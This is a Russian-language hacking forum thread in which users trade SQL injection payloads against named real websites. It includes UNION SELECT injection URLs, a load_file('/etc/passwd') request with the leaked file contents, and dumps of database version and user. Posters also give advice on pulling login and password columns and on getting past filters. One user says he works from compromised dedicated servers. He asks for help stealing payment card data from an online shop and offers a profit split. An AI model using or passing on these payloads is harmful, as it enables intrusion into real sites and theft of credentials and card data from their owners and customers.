если я пишу +UnIoN+AlL+sElEcT+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1-- выдаст 1 строку возможно ли чтобы выдало все таблицы сразу ни по 1 строке?
group_concat() для mysql тока на все таблицы, а в пределах 1024 символов krot читайте мануалы, там вы найдете все ответы на вашы вопросы --------- на этом сайте форум ипб, смотрите в сторону форума
Можно и без огранечения в 1024 через IF или benchmark: https://forum.antichat.ru/showpost.php?p=2298777&postcount=16
Помогите определить БД, похоже на Postgres, но вывода не могу добиться http://www.avtogalaktika.ru/i.cgi?block=11838&ST=1&page=5764+and+1=0+union+select+version()+--+
http://www.avtogalaktika.ru/i.cgi?block=11838&ST=1&page=5764*1 http://www.avtogalaktika.ru/i.cgi?block=11838&ST=1&page=5764*4 http://www.avtogalaktika.ru/i.cgi?block=11838&ST=1&page=5764+union+select+1+--+ http://www.avtogalaktika.ru/i.cgi?block=11838&ST=1&page=5764+union+select+1,2+--+
Туплю, туплю. Инъекция всё же есть. Но т.к. параметр page - то она, скорее всего, в операторе типа LIMIT, и через union её не получится раскрутить.
Code: http://www.avtogalaktika.ru/i.cgi?page=0+union+select+concat_ws(0x3a,version(),user(),database())+--+ 4.1.20:root@localhost:Site2 Code: http://www.avtogalaktika.ru/i.cgi?page=0+union+select+load_file('/etc/passwd')+--+ root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin
Здравствуйте. Я не так давно решил заняться sql injectionom, так вот у меня созрели два вопроса. Я провел sql inject узнал, узнал названние таблиц, и нужной мне ячейки, делаю такой запрос Code: www.сайт.com/index.php?id=-15+union+select+1,2,3,concat_ws(login,0x3a,password),5,6+from+user+--+ Но логин и пароль на странице не поивился, и не выдала не какой ошибки, страница просто появилось. Version: 5.1.35. Тоже самое я пробывал с другими таблицами, все было аналогично Второй вопросДайте пожалуйста сылку на faq! Как провести sql injection в mysql v4.***** я на форуме не увидел не одной нормальной статьи для версии 4.***** я конечно уверен что они тут есть но найти не как не могу. Зараннее огромное спасибо.
1) Не "concat_ws(login,0x3a,password)", а "concat_ws(0x3a,login,password)" или "concat(login,0x3a,password)" Попробуй limit добавить. 2) SQL injection полный FAQ
я вертел по всякому и с +limit+0,1 по разному пробывал! Но данные ячеек не появлялись! Может другие варианты есть? Code: [url=https://forum.antichat.ru/thread43966.html]SQL injection полный FAQ[/url] этот фак я читал, и как я понил он ближе к 5-тым версиям mysql
Тут есть загвоздка! Я все делал на дедики и дедик в это время вырубился, я не знаю что там было может свет моргнул, или еще что данные сылки я утерял так как логи не сохранялись в мазиле а вспомнить не могу, а вобще это был какойто интернет магазин но не могу вспомнить сылку вот могу еще один шоп дать там есть вывод на страницу и тд но не чего интересного там нету _http://e-perfume.com.ar/verproducto.php?id=-180'
Только что нашол интернет магазин! в катором я на 100% уверен хроняться даные о картах, так как покупка проходит имено через этот магазин все данные вбиваются в него, на другие сайты не кидает, но там есть какойто прикол! Допустим я делаю запрос Code: www.сайт.com/index.php?id=15+union+select+1,@@version,3,4,5,6+--+ то сайт показывает информацыю о версии sql // - 5.0.51a-3ubuntu5 если же я делаю любой другой запрос меня перегидывает на главную страницу. Так как я еще совсем новечек и не знаю всех прелестей sql injecta кто согласится мне помоч или сам проведет sql inject конечно все 50 на 50 я согласен даже что вам 60% а мне 40 так как всю работу будите делать вы то отпишите в асю я дам данные сайта icq 144-558-923
Либо ты делаешь неправильный запрос, либо наверняка обращаешься к information_schema и её таблицам, а на них может стоить фильтр. Попробуй выяснить в каком случае тебя перекидывает. ps. а вообще что-то более конкретное советовать можно только увидев сайт.
